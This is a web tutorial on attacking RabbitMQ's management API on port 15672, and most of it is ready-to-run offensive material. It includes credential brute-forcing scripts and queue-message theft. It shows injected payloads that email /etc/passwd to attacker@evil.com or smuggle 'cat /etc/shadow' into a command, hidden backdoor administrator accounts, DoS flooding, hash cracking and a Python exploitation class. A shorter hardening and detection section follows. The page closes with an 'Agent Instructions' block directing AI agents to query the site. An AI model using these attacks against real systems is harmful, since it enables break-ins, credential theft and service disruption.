# RabbitMQ Management - Port 15672 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ## Basic info #### What is RabbitMQ? **RabbitMQ** is a message broker that provides: * **Message queuing** - Asynchronous communication * **Routing** - Flexible message routing * **Multiple protocols** - AMQP, MQTT, STOMP * **High availability** - Clustering and mirroring * **Management interface** - Web UI and HTTP API * **Reliability** - Message persistence and acknowledgments #### AMQP Architecture ``` β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ RabbitMQ/AMQP Architecture β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”‚ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚Producer 1│──────────►│ Exchange β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ (Direct) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ β”‚Producer 2│─────────────────── β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ Routing β”‚ β”‚ β”‚ Keys β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Queues β”‚ β”‚ β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”‚ β”‚ β”‚ Queue 1 β”‚β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Queue 2 │────►│Consumer 1β”‚ β”‚ β”‚ β”‚ Queue 3 β”‚β”€β”€β”€β”€β–Ίβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚Consumer 2β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ β”‚ Management Interface (Port 15672) β”‚ β”‚ β”œβ”€β”€ HTTP API β”‚ β”‚ β”œβ”€β”€ Web UI β”‚ β”‚ └── Monitoring & Control β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ ``` **Ports:** * **15672** - HTTP (Management) * **15671** - HTTPS (Management, if enabled) * **5672** - AMQP (Message broker) * **5671** - AMQPS (Secure AMQP) #### Default Port **Port 15672** - RabbitMQ Management (HTTP) ``` PORT STATE SERVICE 15672/tcp open http RabbitMQ Management ``` ## Reconnaissance & Enumeration #### Port Scanning **Basic Nmap Scan** ```bash # Quick scan nmap -p 15672 -sV # Include AMQP port nmap -p 5672,15672 -sV # Comprehensive scan nmap -p 5671,5672,15671,15672,25672 -sV -A # HTTP scripts nmap -p 15672 --script http-title,http-methods # Scan subnet nmap -p 15672 -sV /24 -oA rabbitmq-scan ``` **Sample Output:** ``` PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.8.9 15672/tcp open http RabbitMQ Management | http-title: RabbitMQ Management |_Requested resource was / ``` #### Web Interface Discovery **Access Management UI** ```bash # HTTP http://:15672/ # HTTPS (if enabled) https://:15671/ ``` **Login Page:** * Default page shows RabbitMQ logo * Login form with username/password * Version information often visible #### API Endpoint Discovery **API Base URL:** ``` http://:15672/api/ ``` **Common API Endpoints:** ```bash # Overview /api/overview # Nodes /api/nodes # Connections /api/connections # Channels /api/channels # Exchanges /api/exchanges # Queues /api/queues # Bindings /api/bindings # Vhosts /api/vhosts # Users /api/users # Permissions /api/permissions # Definitions (complete config) /api/definitions ``` #### Shodan Queries ``` port:15672 RabbitMQ "RabbitMQ Management" port:15672 http.title:"RabbitMQ Management" product:"RabbitMQ" ``` ## Authentication Testing #### Default Credentials **Standard Default:** ``` Username: guest Password: guest Note: guest user only works from localhost by default But often misconfigured to allow remote access ``` **Test Default Credentials:** ```bash # Using curl curl -u guest:guest http://:15672/api/overview # If successful, returns JSON with cluster info ``` #### Common Credentials ``` guest:guest admin:admin administrator:administrator rabbitmq:rabbitmq user:user test:test root:root ``` #### Brute Force Authentication **Using Hydra** ```bash # HTTP Basic Auth brute force hydra -L users.txt -P passwords.txt http-get /api/overview -s 15672 # Single user hydra -l guest -P /usr/share/wordlists/rockyou.txt http-get /api/overview -s 15672 # Verbose mode hydra -L users.txt -P passwords.txt -V http-get /api/overview -s 15672 ``` **Using Metasploit** ```bash msf6 > use auxiliary/scanner/http/rabbitmq_mgmt_login msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > set RHOSTS msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > set USER_FILE users.txt msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > set PASS_FILE passwords.txt msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > run ``` **Custom Python Script** ```python #!/usr/bin/env python3 """ RabbitMQ Management Brute Force """ import requests from requests.auth import HTTPBasicAuth import sys def brute_force(host, port, username, password_file): """Brute force RabbitMQ Management authentication""" url = f"http://{host}:{port}/api/overview" with open(password_file, 'r') as f: for password in f: password = password.strip() try: r = requests.get(url, auth=HTTPBasicAuth(username, password), timeout=5) if r.status_code == 200: print(f"[+] SUCCESS: {username}:{password}") return password else: print(f"[-] Failed: {username}:{password}") except Exception as e: print(f"[!] Error: {e}") print("[-] Password not found") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} ") sys.exit(1) brute_force(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]) ``` ## API Enumeration #### Overview Information **Get Cluster Overview** ```bash # Basic overview curl -u guest:guest http://:15672/api/overview # Returns: { "management_version": "3.8.9", "rates_mode": "basic", "exchange_types": [...], "rabbitmq_version": "3.8.9", "cluster_name": "rabbit@hostname", "erlang_version": "23.1", "node": "rabbit@hostname", ... } ``` #### Node Information **List Nodes** ```bash curl -u guest:guest http://:15672/api/nodes # Returns node details: # - Node name # - OS process ID # - Memory usage # - Disk space # - File descriptors # - Sockets # - Running applications ``` #### Connection Information **List Active Connections** ```bash curl -u guest:guest http://:15672/api/connections # Returns: # - Client IP addresses # - Port numbers # - Connection names # - Virtual host # - User # - Protocol # - Connection state ``` **Extract Client IPs:** ```bash curl -u guest:guest http://:15672/api/connections | jq '.[].peer_host' | sort -u ``` #### Channel Information **List Channels** ```bash curl -u guest:guest http://:15672/api/channels # Shows: # - Active channels # - Channel numbers # - Connection details # - Consumer counts # - Unacknowledged messages ``` #### User Enumeration **List All Users** ```bash curl -u guest:guest http://:15672/api/users # Returns: # - Usernames # - Tags (roles: administrator, management, etc.) # - Password hashes (if permissions allow) ``` **Example Output:** ```json [ { "name": "guest", "password_hash": "gkK...", "hashing_algorithm": "rabbit_password_hashing_sha256", "tags": "administrator" }, { "name": "admin", "password_hash": "xyz...", "hashing_algorithm": "rabbit_password_hashing_sha256", "tags": "administrator" } ] ``` #### Virtual Host Enumeration **List Virtual Hosts** ```bash curl -u guest:guest http://:15672/api/vhosts # Returns: # - Virtual host names # - Messages statistics # - Message rates ``` #### Queue Enumeration **List All Queues** ```bash # All queues curl -u guest:guest http://:15672/api/queues # Queues in specific vhost curl -u guest:guest http://:15672/api/queues/%2F # Note: %2F is URL-encoded "/" ``` **Queue Information Includes:** ```json { "name": "email_queue", "vhost": "/", "durable": true, "auto_delete": false, "messages": 150, "messages_ready": 100, "messages_unacknowledged": 50, "consumers": 3, "memory": 1234567, ... } ``` #### Exchange Enumeration **List Exchanges** ```bash curl -u guest:guest http://:15672/api/exchanges # Shows: # - Exchange names # - Types (direct, fanout, topic, headers) # - Durability # - Auto-delete status # - Message rates ``` #### Binding Enumeration **List Bindings** ```bash # All bindings curl -u guest:guest http://:15672/api/bindings # Bindings for specific queue curl -u guest:guest http://:15672/api/queues/%2F/email_queue/bindings ``` ## Exploitation Techniques #### Message Interception **Read Messages from Queue** ```bash # Get messages (without ack - messages remain) curl -u guest:guest -X POST http://:15672/api/queues/%2F/email_queue/get \ -H "Content-Type: application/json" \ -d '{"count":10,"ackmode":"ack_requeue_false","encoding":"auto"}' # Returns messages with: # - Payload # - Properties # - Routing key # - Exchange ``` **Example Response:** ```json [ { "payload": "{\"to\":\"user@example.com\",\"subject\":\"Password Reset\",\"token\":\"abc123\"}", "payload_bytes": 85, "payload_encoding": "string", "properties": {}, "routing_key": "email", "exchange": "amq.default" } ] ``` #### Message Injection **Publish Message to Queue** ```bash # Publish via default exchange curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "properties": {}, "routing_key": "email_queue", "payload": "{\"to\":\"attacker@evil.com\",\"subject\":\"Malicious\",\"attachments\":[{\"path\":\"/etc/passwd\"}]}", "payload_encoding": "string" }' ``` **Command Injection via Messages:** ```bash # If application processes messages unsafely curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "routing_key": "tasks", "payload": "{\"cmd\":\"id; cat /etc/shadow\"}", "payload_encoding": "string" }' ``` #### Path Traversal Exploitation **File Access via Message Attachments** ```bash # Example: Email service with attachment processing curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "routing_key": "email", "payload": "{\"to\":\"attacker@evil.com\",\"attachments\":[{\"path\":\"../../../../etc/passwd\"}]}", "payload_encoding": "string" }' # Or curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "routing_key": "email", "payload": "{\"to\":\"attacker@evil.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}", "payload_encoding": "string" }' ``` #### Queue Manipulation **Create Malicious Queue** ```bash # Create new queue curl -u guest:guest -X PUT http://:15672/api/queues/%2F/backdoor_queue \ -H "Content-Type: application/json" \ -d '{"durable":false,"auto_delete":false}' ``` **Bind Queue to Exchange** ```bash # Bind to default exchange curl -u guest:guest -X POST http://:15672/api/bindings/%2F/e/amq.default/q/backdoor_queue \ -H "Content-Type: application/json" \ -d '{"routing_key":"backdoor"}' ``` **Purge Queue (DoS)** ```bash # Delete all messages in queue curl -u guest:guest -X DELETE http://:15672/api/queues/%2F/critical_queue/contents ``` #### User Creation (Privilege Escalation) **Create Admin User** ```bash # Create new user with admin privileges curl -u guest:guest -X PUT http://:15672/api/users/backdoor \ -H "Content-Type: application/json" \ -d '{"password":"SecretPass123!","tags":"administrator"}' # Grant permissions curl -u guest:guest -X PUT http://:15672/api/permissions/%2F/backdoor \ -H "Content-Type: application/json" \ -d '{"configure":".*","write":".*","read":".*"}' ``` #### Configuration Export **Dump Complete Configuration** ```bash # Export all definitions curl -u guest:guest http://:15672/api/definitions > rabbitmq_config.json # Contains: # - All users # - All vhosts # - All exchanges # - All queues # - All bindings # - All permissions # - All policies ``` #### Denial of Service **Delete Critical Queues** ```bash # Delete queue curl -u guest:guest -X DELETE http://:15672/api/queues/%2F/critical_queue ``` **Flood with Messages** ```bash # Send large number of messages for i in {1..10000}; do curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d "{\"routing_key\":\"email\",\"payload\":\"spam$i\"}" done ``` ## Password Hash Cracking #### Extract Password Hashes **Get User Hashes** ```bash # List users with hashes curl -u guest:guest http://:15672/api/users | jq '.[].password_hash' # Example hash: # "gkK9xWlKn5aZXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ``` #### Crack RabbitMQ Hashes **Hash Format:** RabbitMQ uses salted SHA-256 (or SHA-512 in newer versions) **Extract and Format:** ```bash # Hash format (base64 encoded): # First 4 bytes = salt # Remaining bytes = SHA256(salt + password) # Decode base64 hash echo "gkK9xWlKn5aZXXXXXXXXXXXXXXXXXXXXXXXXXXXX" | base64 -d | xxd -pr -c128 # Output: <8 hex chars salt> # Example: 8240af6d # Format for hashcat echo "gkK9xWlKn5aZXXXXXXXXXXXXXXXXXXXXXXXXXXXX" | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt ``` **Crack with Hashcat** ```bash # Hashcat mode 1420: sha256($salt.$pass) hashcat -m 1420 --hex-salt hash.txt /usr/share/wordlists/rockyou.txt # With rules hashcat -m 1420 --hex-salt hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule # Brute force hashcat -m 1420 --hex-salt hash.txt -a 3 ?a?a?a?a?a?a?a?a ``` ## Post-Exploitation #### Persistence **Create Backdoor User** ```bash # Create hidden admin user curl -u guest:guest -X PUT http://:15672/api/users/.system \ -H "Content-Type: application/json" \ -d '{"password":"HiddenPass123!","tags":"administrator"}' # Grant all permissions curl -u guest:guest -X PUT http://:15672/api/permissions/%2F/.system \ -H "Content-Type: application/json" \ -d '{"configure":".*","write":".*","read":".*"}' ``` **Create Monitoring Queue** ```bash # Create queue for persistent monitoring curl -u guest:guest -X PUT http://:15672/api/queues/%2F/monitor \ -H "Content-Type: application/json" \ -d '{"durable":true}' # Bind to all exchanges curl -u guest:guest -X POST http://:15672/api/bindings/%2F/e/amq.topic/q/monitor \ -H "Content-Type: application/json" \ -d '{"routing_key":"#"}' ``` #### Information Gathering **Application Architecture Discovery** ```bash # Queue names reveal functionality # email_queue β†’ Email service # payment_processor β†’ Payment system # user_notifications β†’ Notification service # task_scheduler β†’ Background jobs # Analyze queue/exchange names curl -u guest:guest http://:15672/api/queues | jq '.[].name' curl -u guest:guest http://:15672/api/exchanges | jq '.[].name' ``` **Credential Harvesting** ```bash # Messages may contain: # - Database credentials # - API keys # - OAuth tokens # - User passwords (password reset tokens) # - Session tokens # Monitor all queues for credentials for queue in $(curl -u guest:guest http://:15672/api/queues | jq -r '.[].name'); do echo "[*] Checking queue: $queue" curl -u guest:guest -X POST http://:15672/api/queues/%2F/$queue/get \ -H "Content-Type: application/json" \ -d '{"count":100,"ackmode":"ack_requeue_true","encoding":"auto"}' | \ grep -i "password\|token\|secret\|key" done ``` #### Lateral Movement **Extract Connection Information** ```bash # Find other systems connecting to RabbitMQ curl -u guest:guest http://:15672/api/connections | jq '.[] | {name: .name, peer_host: .peer_host, user: .user}' # Output: # { # "name": "10.0.0.5:54321 -> 10.0.0.10:5672", # "peer_host": "10.0.0.5", # "user": "app_user" # } # Pivot to these systems ``` ## Defense & Hardening #### Change Default Credentials **Delete Guest User** ```bash # Delete default guest user rabbitmqctl delete_user guest ``` **Create Strong Admin User** ```bash # Create admin with strong password rabbitmqctl add_user admin 'VeryStrongPassword123!@#$' # Set as administrator rabbitmqctl set_user_tags admin administrator # Grant permissions rabbitmqctl set_permissions -p / admin ".*" ".*" ".*" ``` #### Network Security **Bind to Localhost** ```bash # In rabbitmq.conf management.tcp.ip = 127.0.0.1 # Restart RabbitMQ systemctl restart rabbitmq-server ``` **Firewall Rules** ```bash # UFW sudo ufw deny 15672/tcp # Allow only from specific IPs sudo ufw allow from 192.168.1.0/24 to any port 15672 # iptables sudo iptables -A INPUT -p tcp --dport 15672 -s 192.168.1.0/24 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 15672 -j DROP ``` **Use Reverse Proxy** ```nginx # Nginx with authentication server { listen 80; server_name rabbitmq.example.com; location / { proxy_pass http://127.0.0.1:15672; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; auth_basic "RabbitMQ Management"; auth_basic_user_file /etc/nginx/.htpasswd; # IP whitelist allow 192.168.1.0/24; deny all; } } ``` #### Enable SSL/TLS **Configure HTTPS** ```erlang # In rabbitmq.config [ {rabbitmq_management, [ {listener, [ {port, 15671}, {ssl, true}, {ssl_opts, [ {cacertfile, "/path/to/ca_certificate.pem"}, {certfile, "/path/to/server_certificate.pem"}, {keyfile, "/path/to/server_key.pem"}, {verify, verify_peer}, {fail_if_no_peer_cert, true} ]} ]} ]} ]. ``` #### Access Control **Limit User Permissions** ```bash # Create read-only user rabbitmqctl add_user readonly 'ReadOnlyPass123!' rabbitmqctl set_user_tags readonly management # Grant read-only permissions rabbitmqctl set_permissions -p / readonly "^$" "^$" ".*" ``` **Virtual Host Isolation** ```bash # Create separate vhosts for applications rabbitmqctl add_vhost app1 rabbitmqctl add_vhost app2 # Create users per vhost rabbitmqctl add_user app1_user 'pass1' rabbitmqctl set_permissions -p app1 app1_user ".*" ".*" ".*" rabbitmqctl add_user app2_user 'pass2' rabbitmqctl set_permissions -p app2 app2_user ".*" ".*" ".*" ``` #### Monitoring & Detection **Enable Audit Logging** ```erlang # In rabbitmq.config [ {rabbit, [ {log_levels, [{connection, info}]} ]} ]. ``` **Monitor Management Access** ```bash # Watch access logs tail -f /var/log/rabbitmq/rabbit@hostname.log # Look for: # - Failed authentication attempts # - API access from unusual IPs # - User creation/deletion # - Permission changes # - Queue/exchange manipulation ``` **Intrusion Detection Rules** ```bash # Snort rules for RabbitMQ Management alert tcp any any -> any 15672 (msg:"RabbitMQ Management access"; flow:to_server; sid:1000001;) alert tcp any any -> any 15672 (msg:"RabbitMQ user creation attempt"; content:"PUT"; content:"/api/users/"; sid:1000002;) alert tcp any any -> any 15672 (msg:"RabbitMQ configuration export"; content:"/api/definitions"; sid:1000003;) alert tcp any any -> any 15672 (msg:"RabbitMQ message publish"; content:"/publish"; sid:1000004;) ``` #### Regular Security Practices ```bash # Review users rabbitmqctl list_users # Review permissions rabbitmqctl list_permissions -p / # Review connections rabbitmqctl list_connections # Update RabbitMQ regularly # Check: https://www.rabbitmq.com/changelog.html # Backup configuration curl -u admin:password http://localhost:15672/api/definitions > backup.json # Security audit script #!/bin/bash echo "[*] RabbitMQ Security Audit" # Check if guest user exists rabbitmqctl list_users | grep guest if [ $? -eq 0 ]; then echo "[!] WARNING: Guest user still exists!" fi # Check management binding netstat -tlnp | grep 15672 echo "[*] Management listening on above addresses" echo "[*] Audit complete!" ``` ## Tools & Scripts #### Essential Tools 1. **curl** - HTTP API interaction 2. **rabbitmqctl** - CLI management 3. **Metasploit** - Exploitation modules 4. **Python pika** - AMQP client library 5. **Custom scripts** - Automation #### Python Automation Script ```python #!/usr/bin/env python3 """ RabbitMQ Management Exploitation Tool """ import requests from requests.auth import HTTPBasicAuth import json import sys class RabbitMQExploit: def __init__(self, host, port=15672, username='guest', password='guest'): self.host = host self.port = port self.base_url = f"http://{host}:{port}/api" self.auth = HTTPBasicAuth(username, password) def get_overview(self): """Get cluster overview""" r = requests.get(f"{self.base_url}/overview", auth=self.auth) if r.status_code == 200: return r.json() return None def list_queues(self): """List all queues""" r = requests.get(f"{self.base_url}/queues", auth=self.auth) if r.status_code == 200: return r.json() return [] def list_users(self): """List all users""" r = requests.get(f"{self.base_url}/users", auth=self.auth) if r.status_code == 200: return r.json() return [] def read_messages(self, vhost, queue, count=10): """Read messages from queue""" vhost_encoded = vhost.replace('/', '%2F') url = f"{self.base_url}/queues/{vhost_encoded}/{queue}/get" payload = { "count": count, "ackmode": "ack_requeue_true", "encoding": "auto" } r = requests.post(url, auth=self.auth, json=payload) if r.status_code == 200: return r.json() return [] def publish_message(self, vhost, exchange, routing_key, payload): """Publish message to exchange""" vhost_encoded = vhost.replace('/', '%2F') url = f"{self.base_url}/exchanges/{vhost_encoded}/{exchange}/publish" data = { "properties": {}, "routing_key": routing_key, "payload": payload, "payload_encoding": "string" } r = requests.post(url, auth=self.auth, json=data) return r.status_code == 200 def create_user(self, username, password, tags="administrator"): """Create new user""" url = f"{self.base_url}/users/{username}" data = { "password": password, "tags": tags } r = requests.put(url, auth=self.auth, json=data) return r.status_code == 201 def export_definitions(self): """Export complete configuration""" r = requests.get(f"{self.base_url}/definitions", auth=self.auth) if r.status_code == 200: return r.json() return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} [username] [password]") sys.exit(1) host = sys.argv[1] username = sys.argv[2] if len(sys.argv) > 2 else 'guest' password = sys.argv[3] if len(sys.argv) > 3 else 'guest' exploit = RabbitMQExploit(host, username=username, password=password) print("[*] RabbitMQ Management Exploitation Tool") print(f"[*] Target: {host}") print("\n[*] Overview:") overview = exploit.get_overview() if overview: print(f" Version: {overview.get('rabbitmq_version')}") print(f" Cluster: {overview.get('cluster_name')}") print("\n[*] Queues:") queues = exploit.list_queues() for queue in queues[:5]: print(f" - {queue['name']} ({queue['messages']} messages)") print("\n[*] Users:") users = exploit.list_users() for user in users: print(f" - {user['name']} ({user.get('tags', 'no tags')})") ``` ## Cheat Sheet #### Quick Reference ```bash # PORT SCANNING nmap -p 15672 -sV # WEB ACCESS http://:15672/ # API OVERVIEW curl -u guest:guest http://:15672/api/overview # LIST QUEUES curl -u guest:guest http://:15672/api/queues # LIST USERS curl -u guest:guest http://:15672/api/users # READ MESSAGES curl -u guest:guest -X POST http://:15672/api/queues/%2F/queue_name/get -H "Content-Type: application/json" -d '{"count":10,"ackmode":"ack_requeue_true"}' # PUBLISH MESSAGE curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish -H "Content-Type: application/json" -d '{"routing_key":"queue","payload":"data"}' # CREATE USER curl -u guest:guest -X PUT http://:15672/api/users/newuser -H "Content-Type: application/json" -d '{"password":"pass","tags":"administrator"}' # EXPORT CONFIG curl -u guest:guest http://:15672/api/definitions > backup.json ``` #### Important API Endpoints ``` /api/overview - Cluster information /api/nodes - Node details /api/connections - Active connections /api/channels - Channel information /api/queues - Queue list /api/exchanges - Exchange list /api/users - User list /api/definitions - Complete config export ``` #### Default Credentials ``` guest:guest ``` ### Additional Resources * [RabbitMQ Documentation](https://www.rabbitmq.com/documentation.html) * [RabbitMQ Management Plugin](https://www.rabbitmq.com/management.html) * [RabbitMQ Security](https://www.rabbitmq.com/access-control.html) * [AMQP Specification](https://www.amqp.org/specification/0-9-1/amqp-org-download) * [HackTricks RabbitMQ](https://book.hacktricks.wiki/en/network-services-pentesting/15672-pentesting-rabbitmq-management.html) {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com/)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/rabbitmq-management-port-15672.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.